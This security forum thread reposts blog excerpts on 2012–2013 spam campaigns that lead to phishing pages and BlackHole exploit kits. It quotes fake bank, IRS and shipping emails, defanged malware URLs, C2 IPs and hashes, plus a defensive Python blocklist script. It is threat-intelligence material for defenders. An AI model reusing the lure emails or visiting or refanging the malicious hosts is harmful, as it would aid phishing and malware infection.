Dec 21, 2012 - "... Profile Spy, a once viral scam on Facebook and Twitter that entices users to check out who have been viewing their profiles. Today, on the eve of the rumored 'EoW', it has decided to rear its ugly head once more... the criminals behind it have used a number of tactics to make users hand over their credentials or give them money — like asking users to “Like” their page, answer surveys and copy and paste a code into the address bar. This time, the scammers have used a lot of elements in this effort. One is Facebook, the other two are Tumblr and the Google Chrome Web Store. This scam starts off as a Facebook event invitation spammed to random users who are part of the mark’s network, a social engineering tactic already done in the past. Since the “event” is public, anyone can visit the page if the URL is shared... Visiting any of the links on the comment posted on the page leads users to a Tumblr profile. Clicking “Get it here” then leads users to a similar looking page, which is using Amazon‘s web service, where they can download the Facebook Profile Spy v2.0 for the Google Chrome Internet browser... This rogue extension, once installed, is capable of doing three things: firstly, it updates the mark’s Facebook status by sharing an image and commenting on it — secondly, the extension displays a fake “security CAPTCHA check” pop-up window where the mark can fill in names of persons in his/her network. This then results in the creation of the Profile Spy “event” invitation... Watch that mouse pointer... careful where you direct and click it."
(Screenshots and more info available at the gfi URL above.)
___
Fake ‘Citi Account Alert’ emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2012/12/21/fake-citi-account-alert-themed-emails-lead-to-black-hole-exploit-kit/
Dec 21, 2012 - "Cybercriminals are currently mass mailing hundreds of thousands of emails impersonating Citi, using -two- different professionally looking email templates. Upon clicking on any of the links found in the malicious emails, users are exposed to the client-side exploits served by the latest version of the Black Hole Exploit Kit...
Sample screenshot of the first spamvertised template:
> https://webrootblog.files.wordpress.com/2012/12/citi_email_spam_exploits_malware_social_engineering_black_hole_exploit_kit.png
Sample screenshot of the second spamvertised template:
> https://webrootblog.files.wordpress.com/2012/12/citi_email_spam_exploits_malware_social_engineering_black_hole_exploit_kit_01.png
... Sample client-side exploits serving URLs:
hxxp ://eaglepointecondo .biz/detects/operation_alert_login.php – 59.57.247.185
Name Server: NS1.AMISHSHOPPE .NET – 209.140.18.37 – Email: solaradvent @yahoo .com
Name Server: NS2.AMISHSHOPPE .NET – 211.27.42.138 – Email: solaradvent @yahoo .com
hxxp ://platinumbristol .net/detects/alert-service.php – 59.57.247.185
Name Server: NS1.AMISHSHOPPE .NET – 209.140.18.37 – Email: solaradvent @yahoo .com
Name Server: NS2.AMISHSHOPPE .NET – 211.27.42.138 – Email: solaradvent @yahoo .com
Upon successful client-side exploitation, the campaign drops MD5: b360fec7652688dc9215fd366530d40c * ... Worm:Win32/Cridex.E.
Once executed, the sample performs the following activities:
Accesses Firefox’s Password Manager local database
Creates a thread in a remote process
Installs a program to run automatically at logon ...
Responding to 59.57.247.185 are also the following malicious domains..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/2226d1d4d8c68160ae1fe7393655b30eadb3da3771347228a9583d3313d1fc10/analysis/
File name: readme.exe
Detection ratio: 32/45
Analysis date: 2012-12-20
___
‘Work at Home’ scams impersonating CNBC spotted in the wild
- http://blog.webroot.com/2012/12/21/spamvertised-work-at-home-scams-impersonating-cnbc-spotted-in-the-wild/
Dec 21, 2012 - "... a currently circulating “Work At Home” scam that’s successfully and professionally impersonating CNBC in an attempt to add more legitimacy to its market proposition – the Home Business System...
Sample screenshot of the spamvertised email impersonating CNBC:
> https://webrootblog.files.wordpress.com/2012/12/fake_cnbc_work_at_home_scam_01.png
Sample screenshot of the fake CNBC news article detailing the success of the Home Business System:
> https://webrootblog.files.wordpress.com/2012/12/fake_cnbc_work_at_home_scam.png
No matter where you click, you’ll always be redirected to the Home Business System.
Sample bogus statistics sent by customers of the system:
> https://webrootblog.files.wordpress.com/2012/12/fake_cnbc_work_at_home_scam_02.png
What’s particularly interesting about this campaign is the way the scammers process credit card details. They do it internally, not through a payment processing intermediary, using basic SSL encryption, featuring fake “Site Secured” logos, including one that’s mimicking the “VeriSign Secured” service. Although the SSL certificate is valid, the fact that they even require your CVV/CVV2 code, without providing adequate information on how they store and actually process the credit card numbers in their possession, is enough to make you extremely suspicious.
Sample spamvertised URLs:
hxxp ://5186d4d1.livefreetimenews .com/
hxxp ://5f4a8abae0.get-more-news .com/
Domains participating in the campaign:
worldnewsyesterday .com – Email: johnjbrannigan @teleworm .us
worldnewsimportant .com – Email: johnjbrannigan @teleworm .us
hbs-system .com – Email: cinthiaheimbignerupbg @hotmail .com
Historically, the following domains were also used in a similar fashion:
homeworkhere .com – Email: zoilaprni4d @yahoo .com
lastnewsworld .com – Email: shirleysmith57 @yahoo .com
homecompanysystem .com – Email: deloristrevertonef53 @yahoo .com
> https://webrootblog.files.wordpress.com/2012/12/fake_cnbc_work_at_home_scam_04.png
Users are advised -not- to click on links found in spam emails, and to never entrust their credit card details to someone who’s spamvertising you using the services of some of the most prolific botnets currently online."
:mad: :mad:
AplusWebMaster
2012-12-22, 23:58
FYI...
"New message received" SPAM / siteswillsrockf .com and undering .asia
- http://blog.dynamoo.com/2012/12/new-message-received-spam.html
22 Dec 2012 - "This malicious spam run is part of this large cluster of malicious sites that I wrote about yesterday ( http://blog.dynamoo.com/2012/12/malware-sites-to-block-211212.html ).
Date: Sat, 22 Dec 2012 16:55:38 +0300
From: "Secure.Message" [FAA55EEEE @valencianadeparketts .es]
Subject: New message received
Click here to view the online version.
Hello [redacted],
You have 5 new messages.
Read now
Copyright 2012 SecurePrivateMessage. All rights reserved.
If you would like to update your profile or unsubscribe, please click here.
PLEASE DO NOT REPLY TO THIS MESSAGE.
If you require Technical Support, please check Support Center for information.
Unlike most recent campaigns where the first link in the email is a legitimate but hacked site, this one links directly to a malware server at [donotclick]undering .asia/link.php?login.aspx=[emailaddress]&id=[redacted] with a link that features the email address as part of the URL (presumably to confirm that the address is live). The next step is a redirector link at [donotclick]undering .asia/?affid=00110&promo_type=5&promo_opt=1 which loads a fake anti-virus page, and then it attempts to download a Java exploit from [donotclick]siteswillsrockf .com/?a=YWZmaWQ9MDAxMTA=
undering .asia is hosted on 46.249.42.161, and siteswillsrockf .com on 46.249.42.168. Seeing two malicious sites so closely together indicates that there is a problem with the netblock, so having a closer look at those IPs shows:
inetnum: 46.249.42.0 - 46.249.42.255 ...
The block 46.249.42.0/24 seems to have been suballocated to an unidentified customer of Serverius* who have a long history of badness in their IP ranges. Based on this, I would suggest that you add the 46.249.42.0/24 range to your blocklist to prevent other unidentified malicious servers in this block from being a problem.
There are lots of other suspect domains on these two IPs as well:
46.249.42.161 ...
46.249.42.168 ..."
(Too many to post here - see the dynamoo URL above for more detail.)
* https://www.google.com/safebrowsing/diagnostic?site=AS:50673
:mad: :fear:
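The post above argues that two malicious hosts landing in the same /24 (46.249.42.161 and 46.249.42.168) is reason to block the whole 46.249.42.0/24 range rather than single addresses; the Dec 26 post makes the same call for Cyberbunker's 84.22.96.0/19. The following is an added example (not from the dynamoo post or any tool it names) that turns that rule of thumb into a checkable blocklist: it clusters observed IPs by netblock, flags ranges with repeated hits, and tests thread-style defanged URLs against the result. The hostname-to-IP table is a constructed offline stand-in for DNS, copied from what the posts state.

```python
"""Netblock clustering and blocklist checks for the IoCs quoted in the thread.

Added example, not from the dynamoo post. It implements the post's reasoning:
several malicious hosts in one /24 make the whole block suspect, so the block
goes on the list instead of the individual addresses. RESOLVER is a constructed
offline table (no DNS lookups); the defanging style ("undering .asia",
"[donotclick]", "hxxp ://") follows the thread's own convention.
"""
from collections import defaultdict
from ipaddress import ip_address, ip_network
from typing import Dict, Iterable, List, Optional, Tuple
from urllib.parse import urlsplit

# Constructed sample: IPs named in the thread's posts of 20-26 Dec 2012.
OBSERVED_IPS = [
    "46.249.42.161",   # undering .asia / site-dating2012 .asia
    "46.249.42.168",   # siteswillsrockf .com
    "46.249.58.211",   # earlier dating-themed run, same hoster
    "84.200.77.218",   # libertymonings .info
    "91.224.135.20",   # Blackhole :8080/forum/links/column.php host
    "210.71.250.131",  # Blackhole :8080/forum/links/column.php host
    "46.249.42.161",   # duplicate sighting: must not count twice
]

# Constructed offline "resolver": hostname -> IP as stated in the posts.
RESOLVER = {
    "undering.asia": "46.249.42.161",
    "siteswillsrockf.com": "46.249.42.168",
    "libertymonings.info": "84.200.77.218",
}


def refang(url: str) -> str:
    """Undo the thread's defanging: drop '[donotclick]', restore 'http',
    and close the spaces inserted before the TLD and before '://'."""
    url = url.replace("[donotclick]", "").replace("hxxp", "http")
    url = url.replace(" ://", "://").replace(" .", ".")
    if "://" not in url:
        url = "http://" + url
    return url


def hostname_of(url: str) -> str:
    """Hostname of a (possibly defanged) URL, '' if none can be parsed."""
    return urlsplit(refang(url)).hostname or ""


def cluster_by_prefix(ips: Iterable[str], prefix_len: int = 24) -> Dict[str, set]:
    """Group distinct IPs by the /prefix_len network that contains them."""
    clusters = defaultdict(set)
    for raw in ips:
        addr = ip_address(raw.strip())
        net = ip_network(f"{addr}/{prefix_len}", strict=False)
        clusters[str(net)].add(str(addr))
    return dict(clusters)


def suggest_netblocks(ips: Iterable[str], prefix_len: int = 24,
                      min_hits: int = 2) -> List[str]:
    """Netblocks holding at least min_hits distinct malicious hosts: the
    post's rule of thumb for blocking a range instead of single IPs."""
    clusters = cluster_by_prefix(ips, prefix_len)
    return sorted(net for net, hits in clusters.items() if len(hits) >= min_hits)


def build_blocklist(cidrs: Iterable[str]):
    """Parse CIDR strings (or bare IPs) into network objects."""
    return [ip_network(c, strict=False) for c in cidrs]


def is_blocked(ip: str, blocklist) -> bool:
    """True if ip falls inside any network on the blocklist."""
    addr = ip_address(ip)
    return any(addr in net for net in blocklist)


def check_url(url: str, blocklist,
              resolver: Dict[str, str] = RESOLVER) -> Tuple[str, Optional[str], bool]:
    """Return (hostname, resolved_ip, blocked). Hosts missing from the
    resolver come back as (host, None, False) so the caller can look them up."""
    host = hostname_of(url)
    ip = resolver.get(host)
    if ip is None:
        return host, None, False
    return host, ip, is_blocked(ip, blocklist)


if __name__ == "__main__":
    ranges = suggest_netblocks(OBSERVED_IPS)   # ['46.249.42.0/24']
    ranges.append("84.22.96.0/19")             # Cyberbunker range from the Dec 26 post
    bl = build_blocklist(ranges)
    for u in ["[donotclick]undering .asia/link.php?login.aspx=user@example.com&id=1",
              "hxxp ://libertymonings .info/index/zzz/"]:
        print(check_url(u, bl))
```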
AplusWebMaster
2012-12-24, 04:56
FYI...
Fake "SecureMessage" SPAM / infiesdirekt .asia, pacesetting .asia and siteswillsrockf .net
- http://blog.dynamoo.com/2012/12/securemessage-spam-infiesdirektasia.html
23 Dec 2012 - "Another fake "SecureMessage" spam leading to malware, the same in principle to this spam run* and again hosted on the same Serverius-owned** IPs of 46.249.42.161 and 46.249.42.168. There are several variants of the spam, but they are all very similar and look something like this:
Date: Sun, 23 Dec 2012 14:26:32 +0530
From: "Secure.Message"
Subject: Alert: New message
Click here to view the online version.
Hello [redacted],
You have 4 new messages.
Read now
Copyright 2012 SecureMessage. All rights reserved.
If you would like to update your profile or unsubscribe, please click here.
PLEASE DO NOT REPLY TO THIS MESSAGE.
If you require Technical Support, please check Support Center for information.
... suspect that there is more malicious activity in the 46.249.42.0/24 range and blocking access to it would be a very good thing to do. These are the malicious domains that I can currently identify on those IPs..."
(Long list at the dynamoo URL above.)
* http://blog.dynamoo.com/2012/12/new-message-received-spam.html
** https://www.google.com/safebrowsing/diagnostic?site=AS:50673
:mad:
AplusWebMaster
2012-12-26, 15:51
FYI...
Eastern bloc SPAM...
- http://blog.dynamoo.com/2012/12/godless-eastern-bloc-commie-athiests.html
25 Dec 2012 - "... eastern bloc... spammers are sending out today.
Date: Tue, 25 Dec 2012 22:56:51 -0700
From: "Ticket Support"
Subject: Password Assistance
Thank you for your letter of Dec 25, your information arrived today.
Alright, here's the link to the site:
Proceed to Site
If we can help in any way, please do not hesitate to contact us.
Regards, Yuonne Ferro, Support Team manager.
Some variants of the body text:
- "Thank you for contacting us, your information arrived today."
- "Thank you for your letter regarding our products and services, your information arrived today."
- "Thank you for considering our products and services, your information arrived today."
Some alternative sender names: "Jonie Gunther", "Noreen Macklin", "Bonny Oconnell". The spamvertised site is hosted on 84.22.104.123, which is Cyberbunker*. Given their awful reputation, I am surprised that they haven't been de-peered. Yet. There's certainly nothing of value at all in the 84.22.96.0/19 range, blocking the whole lot will cause you no harm. These are the other spammy domains on the same IP..."
(More detail at the dynamoo URL above.)
* https://en.wikipedia.org/wiki/CyberBunker#Russian_Business_Network
"... a host of the infamous Russian Business Network cyber-crime gang..."
> https://www.google.com/safebrowsing/diagnostic?site=AS:34109
___
Pharmaceutical scammers spamvertise YouTube emails - counterfeit drugs...
- http://blog.webroot.com/2012/12/25/pharmaceutical-scammers-spamvertise-youtube-themed-emails-entice-users-into-purchasing-counterfeit-drugs/
Dec 25, 2012 - "Pharmaceutical scammers are currently spamvertising a YouTube themed email campaign, attempting to socially engineer users into clicking on the links found in the legitimately looking emails. Upon clicking on the fake YouTube personal message notification, users are -redirected- to a website reselling popular counterfeit drugs. The cybercriminals behind the campaign then earn revenue through an affiliate network...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/12/pharmaceutical_scam_email_spam_youtube.png?w=373&h=244
Once users click on the link found in the email, they’re redirected to the following holiday-themed pharmaceutical web site:
> https://webrootblog.files.wordpress.com/2012/12/pharmaceutical_scam_email_spam_youtube_01.png?w=1009
Spamvertised URL: hxxp ://roomwithaviewstudios .com/inherits.html
Landing URL: hxxp ://canadapharmcanadian .net – 109.120.138.155
... fraudulent pharmaceutical sites have also been known to respond to the same IP (109.120.138.155)...
(More detail at the webroot URL above.)...
This isn’t the first time that we’ve intercepted attempts by pharmaceutical scammers to socially engineer potential customers into clicking on the links found in legitimately looking emails. In the past, we’ve found fake Google Pharmacies and emails impersonating YouTube and Twitter, as well as Facebook Inc., in an attempt to add more authenticity and legitimacy to their campaigns. We expect to see -more- of these campaigns in 2013, with a logical peak over the next couple of days, so watch what you click on, don’t enter your credit card details on websites found in spam emails, and never bargain with your health."
___
Fake E-billing SPAM / proxfied .net
- http://blog.dynamoo.com/2012/12/e-billing-spam-proxfiednet.html
26 Dec 2012 - "There are various e-billing spam emails circulating today, pointing to malware on proxfied .net:
Date: Wed, 26 Dec 2012 18:49:37 +0300
From: alets-no-reply @customercenter .citibank .com
Subject: Your Further eBill from Citibank Credit Card
Member: [redacted]
Add alerts@ serviceemail2. citibank .com to your address book to ensure delivery.
Your Account: Important Warning
New eBill Available
Account Number: **************8
Due Date: 12/28/2012
Amount Due: 175.36
Minimum Amount Due: 175.36
How do I view this bill?
1. Sign on to Citibank Online using this link.
2. Use the Payments Menu to find the bill mentioned in this message.
3. Select View Bill to review your bill details. Select the icon to see your bill summary.
Please don't reply to this message.
If you have any questions about your bill, please contact Citibank Credit Card directly. For online payment questions, please choose Bill Payment from the menu.
E-mail Security Zone
At the top of this message, you'll see an E-mail Security Zone. Its purpose is to help you examine that the e-mail was actually sent by Citibank. If you have questions, please visit our help center. To learn more about fraud, click "Security" at the bottom of the screen.
To set up alerts sign on by clicking this link and go to Account Profile.
I prefer not to have this email contain specific information from my statement. Please send me just the announcement that my statement is ready to view online.
View Your Account Pay Your Bill Contact Us
Privacy | Security
Email Preferences
If you want to communicate with us in writing concerning this email, please direct your correspondence to:
Citibank Customer Care Service
P. O. Box 6200
Sioux Hills, SD 57870
Help / Contact Us
If you have questions about your account, please use our secure message center by signing on at by clicking this link and clicking on "Contact Us" from the "Help / Contact Us" menu.
2012 Citibank, N.A.
All rights reserved.
Citi, Citibank and Citi with Arc Design are registered service marks of Citigroup Inc.
3843054050826645
1/LO/439463/221/1I/6H/EH/7126/SYSTEF1 /E5225514741628064/2187
====================
(More sample FAKE emails shown at the dynamoo URL above.)
The malicious payload is at [donotclick]proxfied.net/detects/inform_rates.php hosted on 59.57.247.185 in China (a well-known malware IP address) along with these following malicious domains:
sessionid0147239047829578349578239077 .pl
latticesoft .net
proxfied .net ..."
___
Fake NACHA SPAM / bunakaranka .ru:
- http://blog.dynamoo.com/2012/12/nacha-spam-bunakarankaru.html
26 Dec 2012 - "This fake ACH / NACHA spam leads to malware on bunakaranka .ru:
Date: Wed, 26 Dec 2012 06:48:11 +0100
From: Tagged [Tagged @taggedmail .com]
Subject: Re: Fwd: Banking security update.
Dear Online Account Operator,
Your ACH transactions have been
temporarily disabled.
View details
Best regards,
Security department
The malicious payload is on [donotclick]bunakaranka .ru:8080/forum/links/column.php hosted on the following well-known IPs:
91.224.135.20 (Proservis UAB, Lithuania)
187.85.160.106 (Ksys Soluções Web, Brazil)
210.71.250.131 (Chunghwa Telecom, Taiwan)
Plain list:
91.224.135.20
187.85.160.106
210.71.250.131
Associated domains..."
:mad: :mad:
AplusWebMaster
2012-12-27, 17:16
FYI...
Fake Twitter DM emails lead to Canadian Pharma SPAM
- http://www.gfi.com/blog/fake-twitter-dm-emails-leads-to-canadian-pharma-spam/
Dec 27, 2012 - "We’re seeing quite a few of these “Can I use your…” style messages arriving in mailboxes, taking the form of fake Twitter DM notifications. The most common fakeouts seem to be asking about videos and photographs.
> http://www.gfi.com/blog/wp-content/uploads/2012/12/twitterpicpublish1.png
"Hello, Can i publish link to your photo on my web page?" Another one says:
"Hi. Can i publish link to your video on my home page?"
In both cases, the emails will lead end-users to sites that are most definitely not Twitter. Some of the URLs are offline, but here’s one that is still standing:
> http://www.gfi.com/blog/wp-content/uploads/2012/12/twitterpicpublish2.jpg
Festive Pharma spam – probably not what you need in your post-Xmas stocking. Do your best to steer clear of these."
___
Fake British Airways E-ticket receipts serve malware
- http://blog.webroot.com/2012/12/26/cybercriminals-resume-spamvertising-british-airways-themed-e-ticket-receipts-serve-malware/
Dec 26, 2012 - "... Cybercriminals have resumed spamvertising fake British Airways themed E-receipts — we intercepted the same campaign back in October — in an attempt to trick its customers into executing the malicious attachment found in the emails...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/12/british_airways_email_spam_eticket_malware.png?w=553
Sample detection rate for the malicious attachment:
MD5: b46709cf7a6ff6071a6342eff3699bf0 * ... Worm:Win32/Gamarue.I
Upon execution, it creates the following mutex on infected hosts: SHIMLIB_LOG_MUTEX
It also initiates POST requests to the following IP: 87.255.51.229/ff/image.php
As well as DNS requests to the following hosts:
The IPs are currently sinkholed by Abuse.ch..."
* https://www.virustotal.com/file/fa3e8f3ca8bccc8556233f13918b0fdf74bc53f2762bf7699b984767c4ee91c9/analysis/1356554124/
File name: BritishAirways-eticket.exe
Detection ratio: 39/46
Analysis date: 2012-12-26
___
Fake ‘UPS Delivery Confirmation Failed’ emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2012/12/27/fake-ups-delivery-confirmation-failed-themed-emails-lead-to-black-hole-exploit-kit/
Dec 27, 2012 - "... cybercriminals are currently mass mailing tens of thousands of emails impersonating UPS, in an attempt to trick users into clicking on the malicious links found in the legitimate-looking emails. Once they click on the links, they’re automatically exposed to the client-side exploits served by the BlackHole Exploit kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/12/ups_package_failed_delivery_email_spam_exploits_black_hole_exploit_kit.png?w=603
Sample spamvertised compromised URLs:
hxxp ://www.aberdyn .fr/letter.htm
hxxp ://www.aberdyn .fr/osc.htm
Sample client-side exploits serving URLs:
hxxp ://apendiksator .ru:8080/forum/links/column.php
hxxp ://sectantes-x .ru:8080/forum/links/column.php
Sample malicious payload dropping URL:
hxxp://sectantes-x .ru:8080/forum/links/column.php?uvt=0a04070634&wvqi=33&yrhsb=3307093738070736060b&vjppc=02000200020002
Client-side exploits served: CVE-2010-0188
Although we couldn’t reproduce the client-side exploitation taking place through these domains in the time of posting this analysis, we know that on 2012-09-27 one of the domains (sectantes-x .ru) also served client-side exploits, and dropped a particular piece of malware – MD5: 9f86a132c0a5f00705433632879a20b9 * ... Trojan-Ransom.Win32.PornoAsset.abup.
Upon execution, the sample phones back to the following command and control servers:
178.77.76.102 (AS20773)
91.121.144.158 (AS16276)
213.135.42.98 (AS15396)
207.182.144.115 (AS10297)
More MD5s are known to have phoned back to the same IPs..."
* https://www.virustotal.com/file/56e04562c49321533646b89413154a6c26602c98dd8496f4dd692d6434459be3/analysis/
File name: e284d8a62b6d75b6818ed1150dde2a8bcc3489ee
Detection ratio: 27/42
Analysis date: 2012-09-30
:mad: :mad: :mad:
AplusWebMaster
2012-12-28, 15:15
FYI...
Fake IRS SPAM / tv-usib .com
- http://blog.dynamoo.com/2012/12/irs-spam-tv-usibcom.html
28 December 2012 - "This fake IRS spam leads to malware on tv-usib .com:
Date: Thu, 27 Dec 2012 22:14:44 +0400
From: Internal Revenue Service [information @irs .gov]
Subject: Your transaction is not approved
Your Income Tax outstanding transaction (ID: 3870703170305), recently ordered for processing from your checking account was rejected by Internal Revenue Service payment processing unit.
Canceled Tax transfer
Tax Transaction ID: 3870703170305
Rejection ID See details in the report below
Federal Tax Transaction Report tax_report_3870703170305.pdf (Adobe Acrobat Document)
Internal Revenue Service 3192 Aliquam Rd. Edmond 65332 Oregon
The malicious payload is at [donotclick]tv-usib .com/detects/property-mass-dollar_figure.php hosted on the well-known IP of 59.57.247.185 in China. The following malicious domains appear to be on that IP:
sessionid0147239047829578349578239077.pl
tv-usib .com
proxfied .net
timesofnorth .net
latticesoft .net ..."
:fear::mad:
AplusWebMaster
2013-01-02, 14:34
FYI...
Malware sites to block - 2 Jan 2013
- http://blog.dynamoo.com/2013/01/malware-sites-to-block-2113.html
2 Jan 2013 - "The following sites and IPs seem to be active today, being pushed out by spam campaigns. I'll post email samples when I get them...
(Long list at the dynamoo URL above.)"
___
Malware sites to block - 2 Jan 2013 part II
- http://blog.dynamoo.com/2013/01/malware-sites-to-block-2113-part-ii.html
2 Jan 2013 - "Here's a bunch of malicious IPs and domains to block, mostly based on this in-depth research* at the Malware Must Die! blog.
* http://malwaremustdie.blogspot.com/2012/12/what-happened-if-red-kit-team-up-with.html
As far as I can see, the domains in use are exclusively compromised consumer PCs dotted around the globe, rather than compromised or evil web servers.. so the ISPs are pretty irrelevant in this case. This type of infected host has a relatively short shelf-life, possibly just a few days, so you may or may not want to add them to your blocklist.
IPs... Domains ..."
(Long list at the dynamoo URL above.)
:mad:
AplusWebMaster
2013-01-04, 15:43
FYI...
Twitter Phish DMs: “This profile on Twitter is spreading nasty blogs around about you”
- http://www.gfi.com/blog/twitter-phish-dms-this-profile-on-twitter-is-spreading-nasty-blogs-around-about-you/
Jan 4, 2013 - "... the following missive doing the rounds on Twitter via DMs on compromised accounts:
> http://www.gfi.com/blog/wp-content/uploads/2013/01/twitspam1.jpg
There’s a number of URLs and fake logins being posted right now to users in a wide range of geographical locations, and it all comes down to Twitter phishing with at least one of the phish URLs being registered to an individual claiming to be located in Shanghai, China. That particular site - ivtvtter(dot)com – is currently offline (and also listed in Phishtank*)... attempting to login would result in a 404 error then a redirect to the real Twitter site to make everything look nice and legitimate. These types of Twitter scam come around often, and end-users should always be wary of “Have you seen this” style messaging from contacts..."
* http://www.phishtank.com/phish_detail.php?phish_id=1643038
___
Fake Ebay/Paypal emails lead to client-side exploits and malware
- http://blog.webroot.com/2013/01/04/fake-you-have-made-an-ebay-purchase-themed-emails-lead-to-client-side-exploits-and-malware/
Jan 4, 2013 - "Over the past 24 hours, cybercriminals have launched yet another massive spam campaign, this time impersonating both eBay and PayPal, in an attempt to trick their users into clicking on the client-side exploits and malware serving links found in the malicious emails...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/paypayl_ebay_purchase_email_spam_exploits_malware_black_hole_exploit_kit.png
... Malicious domain names reconnaissance:
litefragmented .pro – 59.64.144.239 – Email: kee_mckibben0869 @macfreak .com
Name Server: NS1.CHELSEAFUN .NET
Name Server: NS2.CHELSEAFUN .NET...
... ibertomoralles .com – 59.57.247.185 – Email: rick.baxter @costcontrolsoftware .com
Name Server: NS1.SOFTVIK .NET – 84.32.116.189 – Email: farbonite @hotmail .com
Name Server: NS2.SOFTVIK .NET – 15.209.33.133 – Email: farbonite @hotmail .com ...
___
Fake 'bank reports' emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2013/01/03/attention-changes-in-the-bank-reports-themed-emails-lead-to-black-hole-exploit-kit/
Jan 3, 2013 - "Cybercriminals are currently spamvertising tens of thousands of emails in an attempt to impersonate the recipients’ bank, tricking them into thinking that the Ministry of Finance in their country has introduced new rules for records keeping, and that they need to print and sign a non-existent document. Once users click on the links found in the malicious emails, they’re automatically exposed to the client-side exploits served by the latest version of the BlackHole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/email_spam_changed_bank_reports_exploits_malware_black_hole_exploit_kit.png
... Malicious domain name reconnaissance:
apendiksator .ru – 91.224.135.20; 210.71.250.131; 187.85.160.106
Name server: ns1.apendiksator .ru – 62.76.186.24
Name server: ns2.apendiksator .ru – 110.164.58.250
Name server: ns3.apendiksator .ru – 42.121.116.38
Name server: ns4.apendiksator .ru – 41.168.5.140
Responding to the same IPs are also the following malicious domains part of the campaign’s infrastructure:
afjdoospf .ru – 91.224.135.20
angelaonfl .ru – 91.224.135.20
akionokao .ru – 91.224.135.20 ...
Although we couldn’t reproduce the malicious payload at apendiksator .ru, we found that the malicious payload served by immerialtv .ru (known to have responded to the same IP) is identical to the MD5: 83db494b36bd38646e54210f6fdcbc0d * ... VirTool:Win32/CeeInject. This MD5 was dropped in a previously profiled campaign..."
* https://www.virustotal.com/file/6260bd364a625d7cbb270c9036473e44f5f8ec479f264f2280d25bf9d56d73da/analysis/
File name: cs8v0k.exe
Detection ratio: 34/42
Analysis date: 2012-06-20
___
Fake BBB (Better Business Bureau) emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2013/01/02/fake-bbb-better-business-bureau-notifications-lead-to-black-hole-exploit-kit/
Jan 2, 2013 - "Cybercriminals have recently launched yet another massive spam campaign, impersonating a rather popular brand used in a decent percentage of social engineering driven email campaigns – the BBB (Better Business Bureau). Once users click on any of the links in the malicious emails, they’re automatically exposed to the client-side exploits served by the BlackHole Exploit kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/email_spam_bbb_better_business_bureau_exploits_malware_black_hole_exploit_kit.png
... Malicious domain name reconnaissance:
tv-usib.com – 59.57.247.185 – Email: twine.tour1 @yahoo .com
Name Server: NS1.AMISHSHOPPE .NET - Email: solaradvent @yahoo .com
Name Server: NS2.AMISHSHOPPE .NET - Email: solaradvent @yahoo .com...
Upon successful client-side exploitation, the campaign drops MD5: 2646f13db754654aff315ff9da9fa911 * ... Worm:Win32/Cridex.E.
Upon execution, the sample phones back to: 94.73.129.120 :8080/rxrt0CA/hIvhA/K66fEB/ ..."
* https://www.virustotal.com/file/4dec5c7de72d15d2137c51b1a78e4a61f62c718c7039ad87925095e04e101bff/analysis/
File name: KB00182962.exe
Detection ratio: 30/45
Analysis date: 2013-01-04
___
Fake Verizon Wireless emails serve client-side exploits and malware
- http://blog.webroot.com/2013/01/02/spamvertised-your-recent-ebill-from-verizon-wireless-themed-emails-serve-client-side-exploits-and-malware/
Jan 2, 2013 - "... yet another Verizon Wireless themed malicious campaign, enticing users to click on the malicious link found in the email. Once users click on the link, they’re automatically exposed to the client-side exploits served by the latest version of the BlackHole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/email_spam_verizon_wireless_citi_ebill_exploits_malware_black_hole_exploit_kit.png
Sample email subjects: Fresh eBill is Should Be Complete. From: Verizon Wireless; Your Recent eBill from Verizon Wireless...
Malicious domain name reconnaissance:
proxfied .net – 59.57.247.185 – Email: colorsandforms @aol .com
Name Server: NS1.AMISHSHOPPE .NET – Email: solaradvent @yahoo .com
Name Server: NS2.AMISHSHOPPE .NET – Email: solaradvent @yahoo .com ..."
:mad:
AplusWebMaster
2013-01-07, 17:38
FYI...
Fake O2 Shop emails - Phish ...
- http://www.gfi.com/blog/fake-o2-shop-mails-dangle-phishy-bait/
Jan 7, 2013 - "... fake O2 Shop emails are in circulation at the moment, in the form of a “security update” asking for login credentials on the back of an “O2 account update” the recipient is supposed to have made. They’re pretty bare bones in terms of how they look, and you’ll notice that in the below example GMail flags it as spam so hopefully lots of other mail service providers will be doing the same thing.
> http://www.gfi.com/blog/wp-content/uploads/2013/01/fakeo2.jpg
Dear User,
You can now check the progress of your account at My O2. Just go to [url removed] and enter your username and password. If you’ve forgotten these, we can send you a reminder here too. Once you’ve signed in, go to My account and follow the instructions.
Regards,
O2 Customer Service
As with so many of these fire and forget spam campaigns, the bulk of them seem to lead to currently AWOL phish pages so they’re likely being taken offline at a fair old pace... treat random mails asking for login credentials with large portions of suspicion, especially when – as above – they’re referencing changes made to your account that you haven’t actually made."
:mad: :fear:
AplusWebMaster
2013-01-09, 01:21
FYI...
Malware sites to block 8/1/13
- http://blog.dynamoo.com/2013/01/malware-sites-to-block-8113.html
8 Jan 2013 - "These IPs and domains appear to be active in malicious spam runs today:
(List at the dynamoo URL above.)
Quite a few of these IPs have been used in multiple attacks; blocking them would be prudent.
Update: some sample emails pointing to a malicious landing page at [donotclick]belnialamsik .ru:8080/forum/links/column.php:
Date: Tue, 8 Jan 2013 10:05:55 +0100
From: Shavonda Duke via LinkedIn [member@linkedin.com]
Subject: Re: Fwd: Security update for banking accounts.
Dear Online Account Operator,
Your ACH transactions have been
temporarily disabled.
View details
Best regards,
Security department
===
Date: Tue, 8 Jan 2013 01:31:43 -0300 [01/07/13 23:31:43 EST]
From: FilesTube [filestube @filestubecom]
Subject: Fwd: Re: Banking security update.
Dear Online Account Operator,
Your ACH transactions have been
temporarily disabled.
View details
Best regards,
Security department
___
Fake "Federal ACH Announcement" SPAM / cookingcarlog .net
- http://blog.dynamoo.com/2013/01/federal-ach-announcement-spam.html
8 Jan 2013 - This rather terse spam leads to malware on cookingcarlog .net:
